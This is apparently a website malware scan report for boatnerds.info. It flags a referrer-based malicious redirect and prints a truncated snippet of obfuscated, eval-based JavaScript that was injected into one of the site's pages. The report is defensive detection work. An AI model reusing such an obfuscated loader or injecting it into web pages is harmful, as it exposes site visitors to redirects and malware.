Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://boatnerds.info/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: boatnerds.info Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 11 Aug 2014 22:58:19 GMT Location: http://arttresci.com/esd.php Server: Apache Content-Length: 300 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://boatnerds.info/ | 200 OK Content-Length: 868 Content-Type: text/html | clean |
http://boatnerds.info/.smileys/ | 200 OK Content-Length: 279 Content-Type: text/html | clean |
http://boatnerds.info/test404page.js | 404 Not Found Content-Length: 2445 Content-Type: text/html | clean |
http://cdn.dsultra.com/js/registrar.js | 200 OK Content-Length: 1652 Content-Type: application/x-javascript | clean |
http://boatnerds.info/404.shtml | 200 OK Content-Length: 2445 Content-Type: text/html | clean |
http://boatnerds.info/500.shtml | 200 OK Content-Length: 94 Content-Type: text/html | clean |
http://boatnerds.info/_gsdata_/ | 200 OK Content-Length: 841 Content-Type: text/html | clean |
http://boatnerds.info/_gsdata_/2012-1226-050000-BZBGQL1-XPS-Nightly%20AIS.log | 200 OK Content-Length: 59561 Content-Type: text/plain | clean |
http://boatnerds.info/_gsdata_/2012-1228-050000-BZBGQL1-XPS-Nightly%20AIS.log | 200 OK Content-Length: 64626 Content-Type: text/plain | clean |
http://boatnerds.info/_gsdata_/2012-1231-050000-BZBGQL1-XPS-Nightly%20AIS.log | 200 OK Content-Length: 63736 Content-Type: text/plain | clean |
http://boatnerds.info/_gsdata_/2013-0102-050000-BZBGQL1-XPS-Nightly%20AIS.log | 200 OK Content-Length: 56180 Content-Type: text/plain | clean |
http://boatnerds.info/_gsdata_/_file_state._gs | 200 OK Content-Length: 300951 Content-Type: text/plain | clean |
http://boatnerds.info/_gsdata_/_saved_/ | 200 OK Content-Length: 304 Content-Type: text/html | clean |
http://boatnerds.info/a1s.boatnerd.com/ | 200 OK Content-Length: 3034 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{window.document.body++}catch(gdsgsdg){dbshre=231;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,117,23,53,25,94,106,90,109,102,95,105,107,38,92,108,96,88,108,94,63,103,92,101,94,104,111,31,31,98,96,109,88,101,94,33,36,50,5,3,7,5,23,24,25,26,117,37,107,107,93,27,52,24,32,98,111,107,104,51,41,42,88,106,109,110,109,92,107,92,99,4 Antivirus reports:
| ||
http://boatnerds.info/a1s/ | 200 OK Content-Length: 5824 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=boatnerds.info
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://boatnerds.info/
Result: boatnerds.info is not infected or malware details are not published yet.
Result: boatnerds.info is not infected or malware details are not published yet.